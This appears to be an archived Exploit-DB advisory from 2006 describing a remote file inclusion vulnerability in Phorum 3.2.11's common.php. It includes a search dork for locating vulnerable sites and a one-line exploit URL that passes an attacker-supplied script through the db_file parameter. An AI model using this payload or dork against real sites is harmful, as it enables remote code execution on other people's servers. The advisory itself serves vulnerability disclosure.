Phorum <= 3.2.11 (common.php) Remote File Include Vulnerability



EDB-ID: 2894 CVE: 2006-6550 OSVDB-ID: 35754
Author: Mr-m07 Published: 2006-12-06 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next 
===========================================================
Yee7TeaM

WwW.Yee7.CoM
===========================================================

Software: Phorum v3.2.11

Vendor: http://www.phorum.org/

Download: http://skrypty.webpc.pl/pobierz274.html

Dork: "Copyright (C) 2000  Phorum Development Team"  and back form doc
folder :)

Description:

Line 31 of common.php

>
>>  // $db_file = './db/postgresql65.php';
>

Exploit: http://[localhost]/[paTh]/common.php?db_file=[Ev!lScript]


===========================================================
By: Mr-m07
Thanx To: ShockShadow & AL-SHIKH
WwW.Yee7.CoM
===========================================================

# milw0rm.com [2006-12-06]






Comments

No comments so far